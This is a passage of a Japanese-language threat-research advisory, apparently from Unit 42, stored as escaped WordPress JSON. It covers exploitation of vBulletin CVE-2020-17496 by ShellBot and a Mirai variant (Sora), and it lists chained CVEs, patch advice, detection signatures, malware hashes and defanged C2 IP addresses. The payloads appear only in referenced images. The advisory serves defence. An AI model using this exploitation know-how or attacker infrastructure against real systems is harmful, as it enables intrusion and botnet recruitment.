0ed\u30fc\u30c9\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u3001\u30d5\u30e9\u30c3\u30c9\u653b\u6483\u306e\u958b\u59cb\u3001\u653b\u6483\u8005\u3078\u306e\u30b7\u30a7\u30eb\u306e\u63d0\u4f9b\u306a\u3069\u3092\u884c\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108685\" aria-describedby=\"caption-attachment-108685\" style=\"width: 900px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-108685 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-24.png\" alt=\"\u524d\u56f3\u306e\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u308b\u3068\u3001IRC\u30d9\u30fc\u30b9\u306e\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30b5\u30fc\u30d0\u30fc\u306b\u63a5\u7d9a\u3057\u3001IRC\u30c1\u30e3\u30cd\u30eb#afk\u306b\u53c2\u52a0\u3057\u3001\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306ePING\u306b\u5fdc\u7b54\u3057\u307e\u3059\uff08\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u53c2\u7167\uff09\u3002 \" width=\"900\" height=\"287\" \/><figcaption id=\"caption-attachment-108685\" class=\"wp-caption-text\">\u56f3 20 ShellBot\u30b9\u30af\u30ea\u30d7\u30c8\u5b9f\u884c\u4e2d\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af<\/figcaption><\/figure>\n<h4><span style=\"font-family: georgia, palatino, serif;\">Sora\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9<\/span><\/h4>\n<p>\u3042\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089Mirai\u306e\u4e9c\u7a2e\uff08Sora\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3053\u3068\u304c\u5224\u660e\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u9593\u9055\u3063\u305fHTTP\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u305f\u3081\u7121\u52b9\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_108687\" aria-describedby=\"caption-attachment-108687\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108687 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-25.png\" alt=\"\u3053\u306eCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089Mirai\u306e\u4e9c\u7a2e\uff08Sora\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"124\" \/><figcaption id=\"caption-attachment-108687\" class=\"wp-caption-text\">\u56f3 21 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 10<\/figcaption><\/figure>\n<p>\u3053\u308c\u3089\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u5206\u6790\u3057\u305f\u7d50\u679c\u3001\u3053\u308c\u3089\u306f\u3055\u307e\u3056\u307e\u306a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u62e1\u6563\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u305f\u3068\u3048\u3070<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-5902\">CVE-2020-5902<\/a>\uff08\u3053\u306e\u5834\u5408\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fbash\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u3067\u7121\u52b9\u3002\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u633f\u5165\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9\u304c\u7279\u5b9aCLI\u4e92\u63db\u30b3\u30de\u30f3\u30c9\u3067\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\uff09\u3001<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-1937\">CVE-2020-1937<\/a>\u3001 <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-10173\">CVE-2020-10173<\/a>\u3001 <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-10987\">CVE-2020-10987<\/a>\u3001Netgear R700\u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027\u3001Netlink GPON\u30eb\u30fc\u30bf\u30fc1.0.11\u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027\u3001\u305d\u3057\u3066\u672c\u7a3f\u3067\u8aac\u660e\u3057\u305f\u8106\u5f31\u6027CVE-2020-17496\u306a\u3069\u3067\u3059\u3002<\/p>\n<h2><strong>\u7d50\u8ad6<\/strong><\/h2>\n<p>\u5f0a\u793e\u306e\u8105\u5a01\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0\u3067\u306f\u3001vBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2020-17496\u306b\u5bfe\u3059\u308b\u3055\u307e\u3056\u307e\u306a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u8a66\u307f\u304c\u691c\u51fa\u3055\u308c\u3066\u3044\u307e\u3059\u3002vBulletin\u306f\u30de\u30fc\u30b1\u30c3\u30c8\u3067\u9577\u5e74\u5b9f\u884c\u3055\u308c\u3001\u5229\u7528\u8005\u6570\u306e\u591a\u3044\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30d1\u30c3\u30b1\u30fc\u30b8\u3067\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u8cb4\u91cd\u306a\u30bf\u30fc\u30b2\u30c3\u30c8\u3068\u8a8d\u8b58\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>vBulletin\u306f\u30012020\u5e748\u670810\u65e5\u306e<a href=\"https:\/\/forum.vbulletin.com\/forum\/vbulletin-announcements\/vbulletin-announcements_aa\/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch\">\u30d1\u30c3\u30c1<\/a>\u3067\u672c\u8106\u5f31\u6027\u3092\u4fee\u6b63\u6e08\u307f\u3067\u3059\u3002\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u3042\u3052\u308b\u3053\u3068\u3067\u30ea\u30b9\u30af\u306f\u8efd\u6e1b\u3055\u308c\u307e\u3059\u306e\u3067\u3001\u305c\u3072\u672c\u30d1\u30c3\u30c1\u3092\u9069\u7528\u3059\u308b\u3053\u3068\u3092\u5f37\u304f\u304a\u52e7\u3081\u3057\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u4e2d\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u5404\u30b5\u30fc\u30d3\u30b9\u3001\u88fd\u54c1\u306b\u3088\u3063\u3066\u3053\u306e\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.jp\/products\/secure-the-network\/subscriptions\/threat-prevention\">\u8105\u5a01\u9632\u5fa1<\/a>\u30b7\u30b0\u30cd\u30c1\u30e3 59133 \u304a\u3088\u3073 80671<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.jp\/products\/threat-detection-and-prevention\/web-security\">URL \u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u306fShellbot\u306b\u95a2\u9023\u3059\u308bC2\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u30d6\u30ed\u30c3\u30af\u3057\u307e\u3059\u3002<\/li>\n<\/ul>\n<h2><strong>\u8ffd\u52a0\u8cc7\u6599<\/strong><\/h2>\n<ul>\n<li><a href=\"https:\/\/unit42.paloaltonetworks.jp\/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759\/\">vBulletin \u306b\u304a\u3051\u308b\u5165\u529b\u78ba\u8a8d\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027(CVE-2019-16759)\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u72b6\u6cc1<\/a><\/li>\n<\/ul>\n<h2><strong>IoC<\/strong><\/h2>\n<h4><span style=\"font-family: georgia, palatino, serif;\">Shellbot\u306e\u30cf\u30c3\u30b7\u30e5\u5024<\/span><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">88DDD8A1B77477AAFFD1BB163B9770D72A77BF29BFCA226E79C28D15BEF983ED<\/span><\/li>\n<\/ul>\n<h4><span style=\"font-family: georgia, palatino, serif;\">Mirai \u4e9c\u7a2e (Sora) \u306e\u30cf\u30c3\u30b7\u30e5\u5024<\/span><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">03bfec4e039805091fe30fa978d5ec7f28431bb0fca4b137e075257b3e1c0dd4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b4cb04709f613b5363514e75984084ef1d3eaba7c50638b2a5a284680831b992<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">94f02ea10b4546da71bd46916f0fe260b40c8ed4deccf0588687e62ca3819ad7<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">bd72be4f7d64795b902f352e47b1654eaee6b5a71cddfaf2c245dba1b2d602eb<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">77b4f7f0d66a0333d756116eaae567a8540392f558c49d507bf6da10bd047fe3<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">051baaabf205c7c0f5fd455ac5775447f9f3df0cc9bc5f66f6d386f368520581<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">fd63b9c7e9dce51348d9600f67139ea8959fdbbca84d505b5e9317bbdca74016<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">8b5810e07cf21ebb1c2ff23c13ce88022c1dd5bc2df32f4d7e5480b4ddb82de2<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ded23c3f5f2950257d8cfb215c40d5f54b28fde23c02f61ce1eb746843f43397<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80fb66c6b1191954c31734355a236b7342dc3fd074ead47f9c1ed465561c6e8c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f30bb52c0e32dfe524fc0dfda1724a1ffb88647c39c33a66dfd66109fecceec7<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1900e09983acf7ddc658b860be7875a527bc914cbffcf0aaff0b4182ecef047b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">fa7575bd0cd2a83995ea34d8d008eb07c2062a843e5e155e2e0d8b35a0cf7901<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">68132010d9a543a6a2a9ea61e771cf2c041cea259cc76affdfe663e20c130a45<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ab671fc0c68ed1c249c2bb52b28ae3d70df8bd1614d86f6d6a3f4c21d7841d72<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4ff21e69b11566336f4fd56ac2829cdcf215182e8ff807f8e744c0a2b08f726f<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">a7373fa18b367edbcd4462345a5da087821e34734bdf05d1c4060a7694868c5e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">dec56b06e03665d2c656b530d3b6f90ca0ec2925bec4559d8a2cec5da3a7700b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">c379139347470254f19041f05e19f5454750e052f04f6d377ec8df19ce959519<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">fed0f0d3e9d990f8a83b86d29e586d46e7cac54efb0eae2f07112d61afb9b885<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">84448ee487010d6fed918febe230b71a8ec1266e300f85933014db2566645857<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">994889422b24a5b4759eda30265f1b933a458e15927b4f7949d4a3ba79eb43ca<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">39b6d72101adae2b71815328599f8e67ee27955849dfb3825c5b2731d504696b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">0747988a77c89c1267a882b663fbd4168e25aed239fb1553e65bb4ac74ecda67<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">99d06d1c82af244b1533c1173ca10da7f29bfbf753073f20f5dc7a0016152a4c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">372ab5c1c23d198b594353239a96d6cf620cc56588f5fdf5dfb32919dd019020<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ef2a6b37568e14dacd5d8894ce2e4bbc593ffd58e197827a052d2c2f0a756949<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1cf9ac9150d59de25ca5ac1f855fadf1b03f13b4e9ced63a12acef9c8292a648<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">cf172b4629e321e4c78a1d0717130bbb693392712a86d3d85d035bae1f377dbd<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1a0293d4863ccef36e138e4f6c65ad013a403db0ffc69ebaf04b43b61b4ba798<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2a14b9b01ec78a332be40339a782a2cf2bf9a237eee9cc5fcd40fa3385b1d4fb<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f56150ff764328ee59eeaafe5e2d63574b475a69386c9ac4978006070807edc9<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9572a532c08f81d7957ffd4639f95c34a2085f119fa426d8ea911af72bfd0b4a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">113ad91a1aab3abcd704fe8670fbc043f049586462a4c58dabdd44c14519ea66<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f9d7d9b11c60bd52625e7d9a33516c2bac96ac542a22696d0da3a9c536dae11b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">6f01ef6670ecd79f9b322dd8521bc13a73037e7f84fa9aad35d11d964d8f9e60<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2960748648bc2cd1b3db5e1e1ce9931a6588d65ae91c6d09e6b8bf2d78b00263<\/span><\/li>\n<\/ul>\n<h4><span style=\"font-family: georgia, palatino, serif;\">IP\u30a2\u30c9\u30ec\u30b9<\/span><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">66[.]7[.]149[.]161<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">178[.]170[.]117[.]50<\/span><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 2019\u5e749\u6708\u306b\u3001\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u898b\u3064\u304b\u3063\u305f\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u8106\u5f31\u6027CVE-2019-16759\u304c\u516c\u8868\u3055\u308c\u307e\u3057\u305f\u3002\u5f53\u6642\u306eUnit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u5f53\u8a72vBulletin\u8106<\/p>\n","protected":false},"author":278,"featured_media":134412,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4469,4428,4470],"tags":[6253,6254,6119],"product_categories":[4346,4442,4443,4456],"coauthors":[836,2070,1348,887],"class_list":["post-108703","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities","category-threat-research-ja","category-vulnerabilities-ja","tag-cve-2019-16759-ja","tag-cve-2020-17496","tag-exploits-ja","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-url-filtering-ja","product_categories-next-generation-firewall-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/title>\n<meta name=\"description\" content=\"\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u5b58\u5728\u3059\u308b\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3001\u65b0\u305f\u306a\u8106\u5f31\u6027CVE-2020-17496\u3092\u4f7f\u3046\u653b\u6483\u304c\u8907\u6570\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u672c\u7a3f\u3067\u306f\u3053\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u306e\u6839\u672c\u8981\u56e0\u3068\u6a5f\u5e8f\u3001\u5bfe\u7b56\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\" \/>\n<meta property=\"og:description\" content=\"\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u5b58\u5728\u3059\u308b\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3001\u65b0\u305f\u306a\u8106\u5f31\u6027CVE-2020-17496\u3092\u4f7f\u3046\u653b\u6483\u304c\u8907\u6570\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u672c\u7a3f\u3067\u306f\u3053\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u306e\u6839\u672c\u8981\u56e0\u3068\u6a5f\u5e8f\u3001\u5bfe\u7b56\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-04T06:32:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-09-04T07:30:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Zhibin Zhang, Haozhe Zhang, Qi Deng, Ruchna Nigam\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8","description":"\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u5b58\u5728\u3059\u308b\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3001\u65b0\u305f\u306a\u8106\u5f31\u6027CVE-2020-17496\u3092\u4f7f\u3046\u653b\u6483\u304c\u8907\u6570\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u672c\u7a3f\u3067\u306f\u3053\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u306e\u6839\u672c\u8981\u56e0\u3068\u6a5f\u5e8f\u3001\u5bfe\u7b56\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","og_locale":"ja_JP","og_type":"article","og_title":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8","og_description":"\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u5b58\u5728\u3059\u308b\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3001\u65b0\u305f\u306a\u8106\u5f31\u6027CVE-2020-17496\u3092\u4f7f\u3046\u653b\u6483\u304c\u8907\u6570\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u672c\u7a3f\u3067\u306f\u3053\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u306e\u6839\u672c\u8981\u56e0\u3068\u6a5f\u5e8f\u3001\u5bfe\u7b56\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","og_site_name":"Unit 42","article_published_time":"2020-09-04T06:32:50+00:00","article_modified_time":"2020-09-04T07:30:17+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg","type":"image\/jpeg"}],"author":"Zhibin Zhang, Haozhe Zhang, Qi Deng, Ruchna Nigam","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/"},"author":{"name":"Zhibin Zhang","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"headline":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8","datePublished":"2020-09-04T06:32:50+00:00","dateModified":"2020-09-04T07:30:17+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/"},"wordCount":935,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg","keywords":["CVE-2019-16759","CVE-2020-17496","exploits"],"articleSection":["Vulnerabilities","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1","\u8106\u5f31\u6027"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","name":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg","datePublished":"2020-09-04T06:32:50+00:00","dateModified":"2020-09-04T07:30:17+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"description":"\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u5b58\u5728\u3059\u308b\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3001\u65b0\u305f\u306a\u8106\u5f31\u6027CVE-2020-17496\u3092\u4f7f\u3046\u653b\u6483\u304c\u8907\u6570\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u672c\u7a3f\u3067\u306f\u3053\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u306e\u6839\u672c\u8981\u56e0\u3068\u6a5f\u5e8f\u3001\u5bfe\u7b56\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/w